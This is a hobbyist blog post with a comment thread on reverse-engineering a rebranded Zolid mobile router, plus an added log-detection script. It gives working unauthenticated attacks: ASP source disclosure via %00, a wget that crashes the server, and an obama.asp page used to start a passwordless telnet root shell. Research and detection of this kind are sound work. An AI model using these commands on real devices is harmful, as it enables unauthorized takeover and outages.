Hacking the Zolid Mobile Router

I recently bought a Zolid “wireless mobile router” at a local ALDI store. It’s a nifty little device with 2xUSB, 2xUTP, and b/g/n wireless. You can plug it directly into a socket or power it through micro USB. It also claims to support a wide range of 3G dongles, so you can use it as a mobile 3G access point. It resembles some of the Linux plug servers like Sheevaplug and Guruplug. Here are some of my findings:

Versions

The Zolid (an ALDI brand) is a rebranded “Amigo 3R161N”, which is also sold by Solwise as the 3g11nmrw and as the E-Top 3r161n, though I can’t find it on the e-top website.

Software details

As I expected, it runs Linux:

Linux version 2.6.19 (root@localhost.localdomain) (gcc version 3.4.6-1.3.5) #1 Fri Feb 26 17:00:34 CST 2010

It has firmware “ver1.1.5” installed.

It uses the “GoAheader-Webs” webserver

It uses Pure-FTPd as FTP server

Firmware

It didn’t ship with a firmware on the CD. Unisupport.net (responsible for Zolid support) doesn’t offer anything for download either, and neither does Amigo. However, Solwise does have two firmwares available at the bottom of their product page.

I haven’t yet succeeded in dissecting the firmware (which helps to find backdoors, exploits, and so on, and may provide an opportunity to create a customized firmware). I think it starts with a “config.dat” file, but I have to research this further.

Hacks, details

Appending %00 to a .asp URL (other characters will also work, e.g. ///) will give you the unrendered source of the ASP page, e.g. http://192.168.1.132/status.asp%00

nmap reports the following open ports and fingerprint:

Interesting ports on default.fritz.box (192.168.1.132):
Not shown: 994 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
515/tcp   open  printer
49152/tcp open  unknown
MAC Address: 00:08:A1:C8:C9:C4 (CNet Technology)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=5.00%D=7/14%OT=21%CT=1%CU=32750%PV=Y%DS=1%G=Y%M=0008A1%TM=4C3D6DD
OS:3%P=i686-pc-linux-gnu)SEQ(SP=CE%GCD=1%ISR=CE%TI=Z%CI=Z%II=I%TS=U)OPS(O1=
OS:M5B4NNS%O2=M5B4NNS%O3=M5B4%O4=M5B4NNS%O5=M5B4NNS%O6=M5B4NNS)WIN(W1=16D0%
OS:W2=16D0%W3=16D0%W4=16D0%W5=16D0%W6=16D0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4N
OS:NS%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=4
OS:0%W=16D0%S=O%A=S+%F=AS%O=M5B4NNS%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T
OS:=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=
OS:0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(
OS:R=Y%DFI=N%T=40%CD=S)

I have been able to find the following additional pages that are not part of the current navigation:
  • opmode.asp
  • one_button.asp
  • ap_one_button.asp
  • wifi_one_button.asp
  • tcpipwan.asp
  • qos.asp
  • downloadserver.asp (*)
  • stats.asp
(*) may crash the internal web server.

Crashing the web server is easy (no authentication required):

wget 'http://192.168.1.132/goform/foo'

Accessing “config.dat” will offer a download containing, I assume, the device’s configuration. It’s probably related to the saveconf.asp page. This file resembles the start of the firmwares I’ve been able to find.

Update

Thanks to info provided by Remco van Mook I’ve found a page on the Sapido GR-1102 which mentions an “obama.asp” page that also works on the Zolid. It allows you to execute arbitrary commands!

Executing /usr/sbin/telnetd -l /bin/sh as command will give you an immediate root shell through telnet.
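
The requests described above (.asp%00 source disclosure, the /goform/foo crash, config.dat and obama.asp) can be spotted in HTTP access logs. This detection sketch is an added example, not part of the original post; it assumes a logging proxy in front of the device that writes Common Log Format, and the rule names, KNOWN_GOFORMS entry and sample lines are constructed.

```python
import re
from urllib.parse import unquote

# Rule names are labels made up for this example; the patterns come from the post.
RULES = [
    # .asp followed by %00 or extra slashes (the two suffixes named in the post)
    ("asp-source-disclosure", re.compile(r"\.asp(?:\x00|/+)(?:\?|$)", re.I)),
    # page that runs arbitrary commands
    ("command-page", re.compile(r"/obama\.asp(?:\?|$)", re.I)),
    # configuration download
    ("config-download", re.compile(r"/config\.dat(?:\?|$)", re.I)),
]
# Hypothetical placeholder: fill with the form handlers your firmware's pages use.
KNOWN_GOFORMS = {"formExample"}
GOFORM = re.compile(r"^/goform/([^/?]*)")
# Common Log Format: client ... "METHOD path HTTP/x.y" ...
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(path):
    """Return the rule names matching a raw (still percent-encoded) path."""
    decoded = unquote(path, encoding="latin-1")  # a %00 suffix becomes a NUL character
    hits = [name for name, rx in RULES if rx.search(decoded)]
    m = GOFORM.match(decoded)
    if m and m.group(1) not in KNOWN_GOFORMS:
        hits.append("unknown-goform")  # e.g. /goform/foo, which crashes the server
    return hits

def scan(lines):
    """Return (client, path, rule_names) for each log line that matches a rule."""
    found = []
    for line in lines:
        m = REQUEST.match(line)
        hits = classify(m.group(2)) if m else []
        if hits:
            found.append((m.group(1), m.group(2), hits))
    return found

# Constructed sample lines, not captured from a real device.
SAMPLE_LOG = [
    '192.168.1.50 - - [14/Jul/2010:10:00:01 +0200] "GET /status.asp HTTP/1.1" 200 5120',
    '192.168.1.50 - - [14/Jul/2010:10:00:05 +0200] "GET /status.asp%00 HTTP/1.1" 200 9312',
    '192.168.1.50 - - [14/Jul/2010:10:00:09 +0200] "GET /goform/foo HTTP/1.1" 502 0',
    '192.168.1.50 - - [14/Jul/2010:10:00:20 +0200] "GET /obama.asp HTTP/1.1" 200 800',
    '192.168.1.50 - - [14/Jul/2010:10:00:31 +0200] "GET /config.dat HTTP/1.1" 200 4096',
    '192.168.1.50 - - [14/Jul/2010:10:00:40 +0200] "POST /goform/formExample HTTP/1.1" 200 120',
]

if __name__ == "__main__":
    for client, path, hits in scan(SAMPLE_LOG):
        print(client, path, ",".join(hits))
```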

Remaining questions

  • How can we dissect the firmware?
  • Shouldn’t sources and licenses be provided somewhere?
  • How can we hack/exploit this device?

Please keep an eye on this page for further updates. Respond in the comments if you have found anything interesting.

Closed comments

    Hi Ivo,

    here are some more goodies. The same product is also on the market as:

    ‘palm server router PE8074’

    ‘7link AWR120g’

    ‘Sapido GR-1102’

    And according to a Russian OpenWRT forum posting here: open-wrt.ru/forum/viewtopic.php?id=13610 the internal hardware is pretty much identical to the Linksys WAP4400N and WRVS4400N devices, for which a full source tree is available.

    I’ll continue digging :)

    Comment by Remco — Jul 14, 2010 3:49:30 PM

    Remco, please don’t spread false assumptions. The PE8074 and AWR120g are TOTALLY DIFFERENT from this Zolid. The Sapido GR-1102 is identical, indeed.

    Comment by David — Sep 28, 2010 1:52:42 PM

    Hey, wow! I wish I’d spent an extra half hour digging through this yesterday. Obama - who’d have thought.

    Comment by Remco — Jul 15, 2010 2:55:07 PM

    Hi Ivo,

    The MAC address (00:08:A1:xx:xx:xx) and the title of the list on www.unisupport.net/download/50673/approved_3g_dongles.pdf point in the direction of: www.cnet.com.tw/html/productCWR-935M-a.htm

    Comment by ahhing — Jul 23, 2010 12:34:50 AM

    Some of the specs I gathered using obama.asp and then telnet:

    CPU: MIPS RTL8652 / R3000 

    RAM: 23576 Kb

    Fun files? /bin/bittorrent.sh . /bin/ping6

    Content of /etc/hosts: 172.20.1.254 rtl8181.realtek.com.tw rtl8181

    So maybe rtl8181.sourceforge.net/ can run on it?

    Comment by Job Snijders — Jul 28, 2010 12:23:51 PM

    Looking forward to hacking this device as well…

    https://forum.openwrt.org/viewtopic.php?id=25930

    My take on a similar device (only 1 USB, without NAS functions)…

    byfai.com/content/sapido-rb-1132-compact-wireless-router

    Cheers.

    Comment by Lo Yuk Fai — Aug 8, 2010 2:03:14 PM

    @LoYukFai It’s very similar to the Zolid and Sapido GR-1102. Have you tried the obama.asp trick?

    I understand openwrt support is nearly complete, let’s hope it works for your device as well.

    Comment by ivo — Aug 9, 2010 8:19:17 AM

    obama.asp works! However, telnetd prompts me for a password and I have no idea whatsoever.

    Anyway, I have got some information via the web interface and posted them on forum.openwrt.org

    Pardon my ignorance, but what’s the OpenWrt status on this stuff…?

    BTW, I just noticed that my device makes some small buzzing noise during operation, does yours do as well…?

    Comment by Lo Yuk Fai — Aug 12, 2010 7:35:55

    Are you executing the command “/usr/sbin/telnetd -l /bin/sh”? That should give you an immediate, passwordless rootshell.

    Keep an eye on aliosa27.net/blog/?p=26 for openwrt news - that’s all I know as well.

    No noises here…

    Comment by ivo — Aug 16, 2010 2:51:15 PM

    Yes, that’s the command I executed.

    I’ll keep an eye on that blog post, thanks for the heads-up.

    I noticed that the small buzzing sound is only emitted during USB-power operation.

    Cheers.

    Comment by Lo Yuk Fai — Aug 17, 2010 2:41:15 PM

    Hi,

    the Zolid router doesn’t recognize my NTFS partition on my external HD drive. It has 1 partition FAT32 and 1 NTFS. The FAT32 is recognized, the NTFS isn’t. Do you know how I can get the NTFS partition visible?

    Comment by john — Aug 23, 2010 2:00:37 PM

    This router is manufactured by CNET.. their own branded router is a CWR-635m…

    Firmware www.cnet.com.tw/product/cwr-635m.html

    You can telnet onto it.. once in type pekpekengeng and you can break out to the #sh

    Comment by Jumpy07 — Sep 14, 2010 9:39:49 PM

    Actually, I think that’s a different model. I already found the pekpekengeng trick, but it doesn’t work (no default telnet access actually). But since we have the obama.asp trick, we’re fine :)

    Comment by ivo — Sep 15, 2010 9:32:10 AM

    Ivo, Jumpy07 is right. The CNet CWR-935M is the same. Identical firmware, runs flawlessly on the Zolid P50673: www.cnet.com.tw/download/cwr-935m.htm

    Comment by David — Sep 28, 2010 2:13:05 PM

    I tried flashing my Sapido GR-1102 with the firmware for the GR-1222, which appears to have all the same functions plus torrent downloading, but it didn’t work. It started uploading, then gave me an error: Incorrect firmware version. Does anybody know how to make the router accept this?

    Comment by Moroni G — Sep 18, 2010 5:10:35 AM

    Ok, I did it. Just updated the GR-1102 to the latest firmware, 1.1.7, then changed the header on the firmware for GR-1222, and uploaded it. Now it shows in the web interface as FUN CENTER GR-1222 (n+ 3.5G NES Server with BT).

    Comment by Moroni G — Sep 18, 2010 6:27:11 AM

    Can one use a WIFI stick as client on the usb port to bridge to the RJ45 port ?

    Comment by le_tos — Sep 21, 2010 8:03:39 PM

    I’m not sure, but why would you want to? The device I’m talking about here has wifi support built-in, and it can already work as a wireless client.

    Comment by ivo — Sep 22, 2010 8:57:40 AM

    OK, if the built-in WIFI client can bridge to the RJ45 ports it would answer my need, by bringing connectivity to devices with RJ45 ports in locations missing UTP cabling. One could even connect a mobile phone on the USB port and share its internet connection to bridge it to the RJ45 ports?

    Comment by le_tos — Sep 23, 2010 11:01:04 AM

    It can be a wireless client, yes. As far as I know, you can’t connect to it through usb (at least with the default firmware)

    Comment by ivo — Sep 24, 2010 8:59:00 AM

    I believe what you want is to connect the computer through the RJ45 port, and use the phone as the 3G/Edge client? It’s not possible with the router’s firmware, but someone did it at aliosa27.net/blog/?p=13. It’s a bit of work, and must be done every time you reboot the router, but can be a lifesaver.

    Comment by Moroni G — Sep 24, 2010 11:39:20 PM

    Here are some pictures of the internals: www.flickr.com/photos/d4v1d0s/sets/72157624927545257/

    It features a RTL8651C SoC, 32 megabyte of RAM, RTL8190 WLAN controller, RTL8256 WLAN transceiver and 8 megabyte of flash memory.

    Comment by David — Sep 28, 2010 3:23:45 PM

    Does anybody know if they got open-WRT running on it?

    Comment by Moroni G — Sep 30, 2010 12:37:48 PM

    Most 3G Router makers publish a modem compatibility list, also sometimes a firmware version change history - but nothing seen on the Amigo websites. Does anyone know where I can find an up-to-date 3G modem compatibility list for the 3R161n? A 2nd question: I gather that like routers, some 3G modems are rebranded. Does anyone know of an App or way of interrogating a 3G USB modem, maybe using ATI Modem commands, to find out the real maker/model no., and perhaps how to read the Rx Signal Strength in dBm?

    Comment by paul — Sep 30, 2010 9:31:24 PM

    unisupport (the company that provides support for the Zolid brand of this device) has a list: www.unisupport.net/download/50673/approved_3g_dongles.pdf

    Comment by ivo — Oct 1, 2010 9:07:55 AM

    Thanks for that list. The USB 3G Modem I use is a Onda MSA405HS - which I cannot find listed on anything but Onda Communications site in Italy - who publish little info on it, and never seen on a Router compatibility list. As mentioned above, I heard many apparent modem makers are just rebadges of an OEM model, and am guessing a reason heard so little about this one is the rebadge name is less well-known than the actual maker. So if you know a way of interrogating the modem to get those details, I would be much obliged, also a way to read the Rx input signal level in dBm. Also, you mention using 169.168.1.132 to get data on the 3R161n, and that you discovered its OS is Linux. All I have is my laptop running Windows. Are you able to point me to a ‘beginners’ guide’ to accessing this data?

    Comment by paul — Oct 1, 2010 11:48:32 PM

    I know that this isn’t hacking in the software sense but I have managed to much improve the wireless range by removing the tiny internal antenna and replacing it with a larger external one. The case can be opened easily enough with a pocket knife, it clips apart. The small antenna is stuck onto the circuit board internals and connected via a standard ipax connector, you can see it in the top right of the PCB in this photo (the connector) www.flickr.com/photos/d4v1d0s/5033181932/in/set-72157624927545257/ This can be replaced with a short ipax-sma socket cable and fixed to the outside casing easily (though I reckon even an internal laptop antenna, which are available on ebay etc for a few euro, would be a big improvement on the antenna shipped with the unit) and an external antenna connected to this. A 2dBi gives a good improvement; I am using a 9dBi which allows me to use skype etc on my mobile phone over a much larger area, before the phone would drop connection even in the same room. I also used this as an opportunity to “hack” some holes in the casing top and bottom as the existing ventilation holes seem very small to me and the unit gets quite hot with 240V power supply. There may be less heating with the 220 v European continental mains supply or a 110v. I’m absolutely sure this voids the warranty :)

    Comment by George — Oct 12, 2010 10:13:06 PM

Last updated April 18, 2013, 4:35 p.m.